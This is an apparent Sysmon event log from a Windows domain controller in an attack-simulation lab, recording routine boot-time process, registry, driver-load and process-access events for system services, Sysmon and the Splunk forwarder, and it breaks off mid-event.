09:19:55.139{5EBD8912-8CA0-6151-0200-00000000FD01}324328C:\Windows\System32\smss.exe{5EBD8912-8CBB-6151-0300-00000000FD01}364C:\Windows\system32\autochk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+4f84|\SystemRoot\System32\smss.exe+20b6|\SystemRoot\System32\smss.exe+65b2|\SystemRoot\System32\smss.exe+a3bb|\SystemRoot\System32\smss.exe+1652|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x80000000000000001052497Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:55.124{5EBD8912-8CBB-6151-0300-00000000FD01}364C:\Windows\System32\autochk.exe10.0.14393.4350 (rs1_release.210407-2154)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=A512733E2C767F87A8029400B4A48CD0,SHA256=1ED75EB59C2897304E0160E0605071178418802C31910D78A2076B0414047875,IMPHASH=1BF5E4792E849FE3BCFE23E7C1B21A3F{5EBD8912-8CA0-6151-0200-00000000FD01}324C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x80000000000000001052496Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:55.107{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x80000000000000001052495Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:55.107{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x80000000000000001052494Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:55.107{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x80000000000000001052493Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:55.107{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x80000000000000001052492Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:55.107{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x80000000000000001052491Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:55.107{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x80000000000000001052490Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:55.107{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x80000000000000001052489Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:55.107{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x80000000000000001052488Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:55.107{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Enter)Binary Data 13241300x80000000000000001052487Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.951{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x80000000000000001052486Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.951{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x80000000000000001052485Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.951{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x80000000000000001052484Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.951{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x80000000000000001052483Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.951{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf\TimeOfLastTelemetryLogQWORD (0x01d7b380-0xc5fbb754) 13241300x80000000000000001052482Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.951{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\gencounter\Parameters\Wdf\TimeOfLastTelemetryLogQWORD (0x01d7b380-0xc5fbb754) 13241300x80000000000000001052481Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.951{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\intelppm\Parameters\Wdf\TimeOfLastTelemetryLogQWORD (0x01d7b380-0xc5fbb754) 13241300x80000000000000001052480Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.951{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x00000014) 13241300x80000000000000001052479Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.951{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x00000014) 13241300x80000000000000001052478Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.951{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\19LPTENUM\MicrosoftRawPort\5&dde82d&0&LPT1 12241200x80000000000000001052477Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteValue2021-09-27 09:19:28.748{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\Parport\ModeCheckedStalled 13241300x80000000000000001052476Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.748{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\Parport\ModeCheckedStalledDWORD (0x00002f89) 13241300x80000000000000001052475Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.748{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Parameters\Wdf\TimeOfLastTelemetryLogQWORD (0x01d7b380-0xc5dcb962) 13241300x80000000000000001052474Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.748{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf\TimeOfLastTelemetryLogQWORD (0x01d7b380-0xc5dcb962) 644600x80000000000000001052473Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:28.310C:\Windows\System32\drivers\AWSNVMe.sysMD5=F973CB5B8A3BF93A98EC05CC5ADE2AF2,SHA256=3FF25D39BE1979F3CE802E3A20BE2DDAD80A7E77EBCFC3393AFC1F24B8F38D34,IMPHASH=CD93018539A11565D60D28DF18DCB293trueAmazon Web Services, Inc.Valid 13241300x80000000000000001052472Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.685{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\ena\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001052471Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.685{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\ena\DriverMajorVersionDWORD (0x00000000) 13241300x80000000000000001052470Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.685{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\ena\NdisMinorVersionDWORD (0x00000032) 13241300x80000000000000001052469Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.685{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\ena\NdisMajorVersionDWORD (0x00000006) 13241300x80000000000000001052468Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.654{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Parameters\WppRecorder_TraceGuid{09281f1f-f66e-485a-99a2-91638f782c49} 13241300x80000000000000001052467Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.638{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\i8042prt\Parameters\WppRecorder_TraceGuid{7ffb8eb8-2c86-45d6-a7c5-c023d9c070c1} 13241300x80000000000000001052466Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.576{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x80000000000000001052465Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.576{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x80000000000000001052464Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.576{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x80000000000000001052463Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001052462Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMajorVersionDWORD (0x00000001) 13241300x80000000000000001052461Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001052460Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMajorVersionDWORD (0x00000006) 13241300x80000000000000001052459Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001052458Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMajorVersionDWORD (0x00000000) 13241300x80000000000000001052457Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMinorVersionDWORD (0x00000028) 13241300x80000000000000001052456Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.529{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMajorVersionDWORD (0x00000006) 13241300x80000000000000001052455Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:28.373{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\cdrom\Parameters\WppRecorder_TraceGuid{a4196372-c3c4-42d5-87bf-7edb2e9bcc27} 13241300x80000000000000001052454Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:25.076{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001052453Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:25.076{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\CountDWORD (0x00000001) 13241300x80000000000000001052452Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:25.076{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\0STORAGE\Volume\{063c67cf-1c3b-11ec-ab2e-806e6f6e6963}#0000000000100000 13241300x80000000000000001052451Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:25.076{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001052450Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:25.076{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\CountDWORD (0x00000001) 13241300x80000000000000001052449Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:25.076{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\0STORAGE\Volume\{063c67cf-1c3b-11ec-ab2e-806e6f6e6963}#0000000000100000 434400x80000000000000001052448Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local2021-09-27 09:20:16.759Started13.014.50 17141700x80000000000000001053506Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:17.914{5EBD8912-8CBD-6151-0A00-00000000FD01}624\Winsock2\CatalogChangeListener-270-0C:\Windows\system32\services.exe 10341000x80000000000000001053505Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.914{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD1-6151-3C00-00000000FD01}3600C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053504Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.914{5EBD8912-8CD1-6151-3A00-00000000FD01}35323536C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053503Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.898{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053502Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.898{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053501Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.898{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053500Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.898{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053499Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.898{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053498Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.898{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053497Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.898{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053496Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.898{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053495Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.898{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053494Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.890{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210927092016-000MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053493Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 